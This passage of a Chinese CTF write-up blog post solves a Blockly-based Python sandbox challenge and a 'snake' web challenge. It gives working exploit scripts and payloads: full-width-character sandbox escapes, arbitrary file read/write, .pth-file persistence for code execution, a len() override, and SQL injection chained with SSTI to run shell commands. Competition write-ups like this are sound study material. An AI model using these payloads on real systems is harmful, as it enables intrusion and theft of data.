class="punctuation">&#123;</span></span><br><span class="line">          <span class="attr">&quot;TEXT&quot;</span><span class="punctuation">:</span> <span class="string">&quot;＇\nｐｒｉｎｔ（１）\n＃&quot;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;inputs&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">      <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<p>就成功打印了 1</p>
<p><img src="/images/image-53-Db6jnYEx.png" alt="img" /></p>
<h4 id="法一-python-的-pth-文件机制"><a class="markdownIt-Anchor" href="#法一-python-的-pth-文件机制"></a> 法一 Python 的 .pth 文件机制</h4>
<p>尝试构造命令读取任意文件</p>
<p>尝试读取 /etc/passwd</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;blocks&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;blocks&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">      <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;text&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;fields&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">          <span class="attr">&quot;TEXT&quot;</span><span class="punctuation">:</span> <span class="string">&quot;＇\nｐｒｉｎｔ（ｏｐｅｎ（＂／ｅｔｃ／ｐａｓｓｗｄ＂）．ｒｅａｄ（））\n＃&quot;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;inputs&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">      <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/image-52-CObtPZSa.png" alt="img" /></p>
<p>成功读取</p>
<p>但是根据提示读取 /flag 时没有回显，猜测是没有权限导致的</p>
<p>然后尝试构造命令尝试实现写入文件到指定位置</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;blocks&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;blocks&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">      <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;text&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;fields&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">          <span class="attr">&quot;TEXT&quot;</span><span class="punctuation">:</span> <span class="string">&quot;＇\nｏｐｅｎ（＂／ｔｍｐ／１．ｔｘｔ＂， ＂ｗ＂）．ｗｒｉｔｅ（＂ｈａｃｋ！＂）\n＃&quot;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;inputs&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">      <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<p>发包后再配合任意文件读取</p>
<p><img src="/images/image-57-DzfSq3UZ.png" alt="img" /></p>
<p>发现确实是成功写入了</p>
<p>在网上找到一篇文章:;</p>
<p><img src="/images/image-55-Cl8-fg3f.png" alt="img" /></p>
<h5 id="知识点"><a class="markdownIt-Anchor" href="#知识点"></a> 知识点</h5>
<p><strong>Python 的 .pth 文件机制</strong></p>
<ul>
<li>Python 在启动时会自动加载 <code>site-packages</code> 目录下的 <code>.pth</code> 文件</li>
<li><code>.pth</code> 文件中的每一行都会被 Python 解释器执行</li>
<li>这为我们提供了在 Python 进程启动时执行任意代码的机会</li>
</ul>
<p>可以在 <code>/usr/local/lib/python&#123;version&#125;/site-packages/th.pth</code> 路径写入文件</p>
<p>文件内容为我们的恶意代码，当下次 Python 进程启动时，会自动执行这个命令</p>
<h5 id="解题"><a class="markdownIt-Anchor" href="#解题"></a> 解题</h5>
<p><strong>可以利用 Python 的 site-packages 来实现把命令写入 Python 进程，也就是在 site-packages 下写入 pth 文件，Python 在运行时会自动加载 site-packages 的内容，可以以此实现命令执行。</strong></p>
<p>这题现在可以控制文件写入，也可以读取任意文件，再配合这篇文章就可以实现获得类似 shell 的情况。</p>
<p>但是本题的 Python 版本号未知，<strong>所以路径只需要知道版本号</strong>，就可以成功。</p>
<p>Python的版本号可以通过字典取用脚本遍历发包。</p>
<p>所以编写的脚本逻辑如下：在写入 pth 的路径上遍历 Python 版本号发包，每发一次包，检测一次文件内容是否存在，如果存在，就返回内容，如果不存在，就继续遍历版本号。</p>
<p>在实测后发现可以使用 suid 提权，dd提取。</p>
<p>最终构造的 exp 如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line"><span class="comment"># 指定的 URL</span></span><br><span class="line">url = <span class="string">&#x27;http://eci-2zedptpxwuwjn4b3opng.cloudeci1.ichunqiu.com:5000/blockly_json&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Python 版本列表</span></span><br><span class="line">python_versions = [</span><br><span class="line">    <span class="string">&#x27;２．０&#x27;</span>, <span class="string">&#x27;２．１&#x27;</span>, <span class="string">&#x27;２．２&#x27;</span>, <span class="string">&#x27;２．３&#x27;</span>, <span class="string">&#x27;２．４&#x27;</span>, <span class="string">&#x27;２．５&#x27;</span>, <span class="string">&#x27;２．６&#x27;</span>, <span class="string">&#x27;２．７&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;３．０&#x27;</span>, <span class="string">&#x27;３．１&#x27;</span>, <span class="string">&#x27;３．２&#x27;</span>, <span class="string">&#x27;３．３&#x27;</span>, <span class="string">&#x27;３．４&#x27;</span>, <span class="string">&#x27;３．５&#x27;</span>, <span class="string">&#x27;３．６&#x27;</span>, <span class="string">&#x27;３．７&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;３．８&#x27;</span>, <span class="string">&#x27;３．９&#x27;</span>, <span class="string">&#x27;３．１０&#x27;</span>, <span class="string">&#x27;３．１１&#x27;</span>, <span class="string">&#x27;３．１２&#x27;</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Referer&#x27;</span>: <span class="string">&#x27;http://eci-2zedptpxwuwjn4b3opng.cloudeci1.ichunqiu.com:5000/&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Origin&#x27;</span>: <span class="string">&#x27;http://eci-2zedptpxwuwjn4b3opng.cloudeci1.ichunqiu.com:5000&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;Hm_lvt_2d0601bd28de7d49818249cf35d95943=1729519407,1729596487,1729933103,1730457200; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Accept-Language&#x27;</span>: <span class="string">&#x27;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;X-Requested-With&#x27;</span>: <span class="string">&#x27;XMLHttpRequest&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Priority&#x27;</span>: <span class="string">&#x27;u=0&#x27;</span>,</span><br><span class="line">&#125;</span><br><span class="line">command = <span class="string">&quot;ｄｄ　ｉｆ＝／ｆｌａｇ&quot;</span> <span class="comment">#输入全角后的bash命令</span></span><br><span class="line">filename = <span class="string">&quot;ｆｌａｇ&quot;</span> <span class="comment">#输入全角后的文件名</span></span><br><span class="line"><span class="comment"># 遍历版本并发送 POST 请求</span></span><br><span class="line"><span class="keyword">for</span> version <span class="keyword">in</span> python_versions:</span><br><span class="line">    <span class="comment"># 构造 POST 数据</span></span><br><span class="line">    payload = &#123;</span><br><span class="line">    <span class="string">&quot;blocks&quot;</span>: &#123;</span><br><span class="line">      <span class="string">&quot;blocks&quot;</span>: [</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="string">&quot;type&quot;</span>: <span class="string">&quot;text&quot;</span>,</span><br><span class="line">          <span class="string">&quot;fields&quot;</span>: &#123;</span><br><span class="line">            <span class="string">&quot;TEXT&quot;</span>: <span class="string">f&quot;＇\nｏｐｅｎ（＂／ｕｓｒ／ｌｏｃａｌ／ｌｉｂ／ｐｙｔｈｏｎ<span class="subst">&#123;version&#125;</span>／ｓｉｔｅ－ｐａｃｋａｇｅｓ／ｔｈ．ｐｔｈ＂， ＂ｗ＂）．ｗｒｉｔｅ（＂ｉｍｐｏｒｔ ｏｓ；ｏｓ．ｓｙｓｔｅｍ（＇ｂａｓｈ －ｃ ＼＂<span class="subst">&#123;command&#125;</span> ＞ ／ｔｍｐ／<span class="subst">&#123;filename&#125;</span>＼＂＇）＂）\n＃&quot;</span></span><br><span class="line">          &#125;,</span><br><span class="line">          <span class="string">&quot;inputs&quot;</span>: &#123;&#125;</span><br><span class="line">        &#125;</span><br><span class="line">      ]</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 发送 POST 请求</span></span><br><span class="line">    response = requests.post(url, json=payload)</span><br><span class="line">    <span class="comment">#print(payload)</span></span><br><span class="line">    <span class="comment"># 打印响应状态和内容</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;python版本: <span class="subst">&#123;version&#125;</span>, 状态码: <span class="subst">&#123;response.status_code&#125;</span>, 内容: <span class="subst">&#123;response.text&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 访问回显的 POST 包</span></span><br><span class="line">    echo_payload = &#123;</span><br><span class="line">        <span class="string">&quot;blocks&quot;</span>: &#123;</span><br><span class="line">            <span class="string">&quot;blocks&quot;</span>: [&#123;</span><br><span class="line">                <span class="string">&quot;type&quot;</span>: <span class="string">&quot;text&quot;</span>,</span><br><span class="line">                <span class="string">&quot;fields&quot;</span>: &#123;</span><br><span class="line">                    <span class="string">&quot;TEXT&quot;</span>: <span class="string">f&quot;＇\nｐｒｉｎｔ（ｏｐｅｎ（＂／ｔｍｐ／<span class="subst">&#123;filename&#125;</span>＂）．ｒｅａｄ（））\n＃&quot;</span></span><br><span class="line">                &#125;,</span><br><span class="line">                <span class="string">&quot;inputs&quot;</span>: &#123;&#125;</span><br><span class="line">            &#125;]</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 发送回显请求</span></span><br><span class="line">    echo_response = requests.post(url, json=echo_payload)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 打印回显响应状态和内容</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;状态码: <span class="subst">&#123;echo_response.status_code&#125;</span>, 内容: <span class="subst">&#123;echo_response.text&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(echo_response.text) &gt; <span class="number">10</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;写进去了,不干了.&quot;</span>)</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/image-56-CMmvbkBz.png" alt="img" /></p>
<h4 id="法二-闭合逃逸覆盖len"><a class="markdownIt-Anchor" href="#法二-闭合逃逸覆盖len"></a> 法二 闭合逃逸+覆盖len</h4>
<p>由于这里是拼接字符串，我们可以逃逸出去执行任意python代码</p>
<p>先用’）闭合 print, 后面的内容可以用#号注释后面的内容，中间回车即可逃逸</p>
<p><img src="/images/AuPpbLh5mobpgwx1jjRchMe6nld.png" alt="img" /></p>
<p>举个栗子：我传入<code>a')\nprint(&quot;Infernity&quot;)#</code>，经过拼接之后就变成了：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Infernity&quot;</span>)<span class="comment">#&#x27;)</span></span><br></pre></td></tr></table></figure>
<p>就会回显<code>a</code>和<code>Infernity</code>。我们再把特殊字符找到它最相似的字符：比如<code>(</code>换成<code>⁽</code>，<code>#</code>换成<code>﹟</code>。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a＇⁾\nprint⁽＂Infernity＂⁾﹟</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20241102125723325.png" alt="image-20241102125723325" /></p>
<p>这样的嵌套blockly块会构造生成：<code>print('恶意代码字符串(即嵌套的TEXT)')</code></p>
<p>方便后续转换，这里贴一个全角字符转换脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">text = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(text.replace(<span class="string">&#x27;_&#x27;</span>,<span class="string">&#x27;＿&#x27;</span>).replace(<span class="string">&#x27;(&#x27;</span>,<span class="string">&#x27;⁽&#x27;</span>).replace(<span class="string">&#x27;)&#x27;</span>,<span class="string">&#x27;⁾&#x27;</span>).replace(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;＇&#x27;</span>).replace(<span class="string">&#x27;#&#x27;</span>,<span class="string">&#x27;﹟&#x27;</span>).replace(<span class="string">&#x27;[&#x27;</span>,<span class="string">&#x27;［&#x27;</span>).replace(<span class="string">&#x27;]&#x27;</span>,<span class="string">&#x27;］&#x27;</span>).replace(<span class="string">&#x27;=&#x27;</span>,<span class="string">&#x27;⁼&#x27;</span>).replace(<span class="string">&#x27;&quot;&#x27;</span>,<span class="string">&#x27;＂&#x27;</span>).replace(<span class="string">&#x27;.&#x27;</span>,<span class="string">&#x27;․&#x27;</span>).replace(<span class="string">&#x27;:&#x27;</span>,<span class="string">&#x27;：&#x27;</span>).replace(<span class="string">&#x27;/&#x27;</span>,<span class="string">&#x27;／&#x27;</span>).replace(<span class="string">&#x27;-&#x27;</span>,<span class="string">&#x27;－&#x27;</span>).replace(<span class="string">&#x27;&gt;&#x27;</span>,<span class="string">&#x27;﹥&#x27;</span>))</span><br></pre></td></tr></table></figure>
<p>现在绕过第一步了，第二步到了要rce的地方</p>
<p>我们传入的东西都会进这个hook，AST 沙箱会将用户的输入转化为操作码，此时字符串层面的变换基本上没用了。但是这里没有过滤os和system，所以我们可以直接<code>__import__(&quot;os&quot;).system(&quot;whoami&quot;)</code></p>
<p>但是len(event_name)有限制，会检测os.system，我们的长度肯定是超过了的。</p>
<p>但是我们可以通过<strong>覆盖len函数</strong>，来绕过长度限制：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__builtins__.len = lambda x:1</span><br></pre></td></tr></table></figure>
<p>然后直接rce了</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a＇⁾\n＿＿builtins＿＿․<span class="built_in">len</span> ⁼ <span class="keyword">lambda</span> x：<span class="number">1</span>\n＿＿<span class="keyword">import</span>＿＿⁽＇os＇⁾․system⁽＇whoami＇⁾﹟</span><br></pre></td></tr></table></figure>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a＇⁾＃\n＿＿builtins＿＿․<span class="built_in">len</span> ⁼ <span class="keyword">lambda</span> x：<span class="number">1</span>\n\n［ x․＿＿init＿＿․＿＿<span class="built_in">globals</span>＿＿ <span class="keyword">for</span> x <span class="keyword">in</span> ＇＇․＿＿<span class="keyword">class</span>＿＿․＿＿base＿＿․＿＿subclasses＿＿⁽⁾ <span class="keyword">if</span> x․＿＿name＿＿⁼⁼＂＿wrap＿close＂］［<span class="number">0</span>］［＂system＂］⁽＂ls ／－al＂⁾＃</span><br></pre></td></tr></table></figure>
<p><img src="/images/b017e470-feda-4a53-96d2-90a7133a1505.png" alt="b017e470-feda-4a53-96d2-90a7133a1505" /></p>
<p>需要提权</p>
<p><a target="_blank" rel="noopener" href="https://infernity.top/img/qwb2024/cd60b7cd-e902-477d-ab12-d4fe477b4460.png"><img src="/images/cd60b7cd-e902-477d-ab12-d4fe477b4460.png" alt="cd60b7cd-e902-477d-ab12-d4fe477b4460" /></a></p>
<p><img src="/images/f1abf556-2db2-48f5-9881-8557a07d55a7.png" alt="f1abf556-2db2-48f5-9881-8557a07d55a7" /></p>
<p>脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment"># burp0_url = &quot;http://10.45.133.108:5000/blockly_json&quot;</span></span><br><span class="line">burp0_url=<span class="string">&quot;http://eci-2zecsejgdlgg4f2j75k2.cloudeci1.ichunqiu.com:5000/blockly_json&quot;</span></span><br><span class="line">burp0_headers = &#123;<span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;*/*&quot;</span>, <span class="string">&quot;X-Requested-With&quot;</span>: <span class="string">&quot;XMLHttpRequest&quot;</span>, <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36&quot;</span>, <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/json&quot;</span>, <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;http://10.45.133.108:5000&quot;</span>, <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;http://10.45.133.108:5000/&quot;</span>, <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate&quot;</span>, <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>, <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;close&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line">burp0_json=&#123;<span class="string">&quot;blocks&quot;</span>:&#123;<span class="string">&quot;languageVersion&quot;</span>:<span class="number">0</span>,<span class="string">&quot;blocks&quot;</span>:[&#123;<span class="string">&quot;type&quot;</span>:<span class="string">&quot;print&quot;</span>,<span class="string">&quot;id&quot;</span>:<span class="string">&quot;5?,O$5;|6hmZ)ypq0^+C&quot;</span>,<span class="string">&quot;x&quot;</span>:<span class="number">252</span>,<span class="string">&quot;y&quot;</span>:<span class="number">165</span>,<span class="string">&quot;inputs&quot;</span>:&#123;<span class="string">&quot;TEXT&quot;</span>:&#123;<span class="string">&quot;block&quot;</span>:&#123;<span class="string">&quot;type&quot;</span>:<span class="string">&quot;text&quot;</span>,<span class="string">&quot;id&quot;</span>:<span class="string">&quot;+8hjG^l`1Sgw#Skm]H*+&quot;</span>,<span class="string">&quot;fields&quot;</span>:&#123;<span class="string">&quot;TEXT&quot;</span>:<span class="string">&#x27;&#x27;&#x27;’）</span></span><br><span class="line"><span class="string">def len（a）：</span></span><br><span class="line"><span class="string">    return 0</span></span><br><span class="line"><span class="string">a＝＿＿import＿＿（“os”）。system（“dd if＝／flag”） </span></span><br><span class="line"><span class="string">print（a）                                                                                                                                                                                                                                                                                                                                                                                 </span></span><br><span class="line"><span class="string">＃＼‘&#x27;&#x27;&#x27;</span>&#125;&#125;&#125;&#125;&#125;]&#125;&#125;</span><br><span class="line"></span><br><span class="line">r=requests.post(burp0_url, headers=burp0_headers, json=burp0_json)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>
<p>最后拼接而成的payload为：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">len</span>(<span class="params">a</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">a=<span class="built_in">__import__</span>(<span class="string">&quot;os&quot;</span>).system(<span class="string">&quot;dd if=/flag&quot;</span>) </span><br><span class="line"><span class="built_in">print</span>(a)                                                                                                                                                       </span><br><span class="line"><span class="comment">#\&#x27;&#x27;)</span></span><br></pre></td></tr></table></figure>
<h3 id="snake"><a class="markdownIt-Anchor" href="#snake"></a> snake</h3>
<p>把每次行动延时改为0.4秒，手打50分就通关了。</p>
<p>setInterval(update, 400);</p>
<p>胜利页面：<code>/snake_win?username=admin</code>可以xss没啥用</p>
<p>经过测试发现可以sql注入，数据库是sqllite的：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/snake_win?username=a&#x27;union select 1,2,sqlite_version()--</span><br></pre></td></tr></table></figure>
<p>后面查表查数据没找到任何有用的东西，最后发现是结合了ssti。=-=</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27;union select 1,2,(select &quot;&#123;&#123;7*7&#125;&#125;&quot;) --</span></span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://infernity.top/img/qwb2024/42945632-6661-4760-b130-3559fd11e990.png"><img src="/images/42945632-6661-4760-b130-3559fd11e990.png" alt="42945632-6661-4760-b130-3559fd11e990" /></a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a&#x27;union select 1,2,(select &quot;&#123;&#123;().__class__.__base__.__subclasses__()[117].__init__.__globals__[&#x27;popen&#x27;](&#x27;cat /f*&#x27;).read()&#125;&#125;&quot;)--</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://infernity.top/img/qwb2024/a2e4f41f-7361-42a5-a884-4ad919838dc0.png"><img src="/images/a2e4f41f-7361-42a5-a884-4ad919838dc0.png" alt="a2e4f41f-7361-42a5-a884-4ad919838dc0" /></a></p>
<p>有点脑洞了。</p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Python%E7%9A%84-pth%E6%96%87%E4%BB%B6%E6%9C%BA%E5%88%B6/" rel="tag">Python的.pth文件机制</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/" rel="tag">比赛复现</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/images/bg1.jpg" data-sizes="auto" alt="一次JAVA反序列化配合内存马CTF例题" class="lazyload">
          
        
        <a href="/2025/10/18/%E4%B8%80%E6%AC%A1JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%85%8D%E5%90%88%E5%86%85%E5%AD%98%E9%A9%ACCTF%E4%BE%8B%E9%A2%98/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            一次JAVA反序列化配合内存马CTF例题
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/images/126839103p0master1200.jpg" data-sizes="auto" alt="JS学习" class="lazyload">
        
      
      <a href="/2025/10/15/JS%E5%AD%A6%E4%B9%A0/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          JS学习
        
      </h3>
    </div>
    
  </nav>


</article>






</section>
        </div>
        
        
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2026
      <span class="footer-info-sep rotate"></span>
      FuB0Y
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        1227.1k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        97:36
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
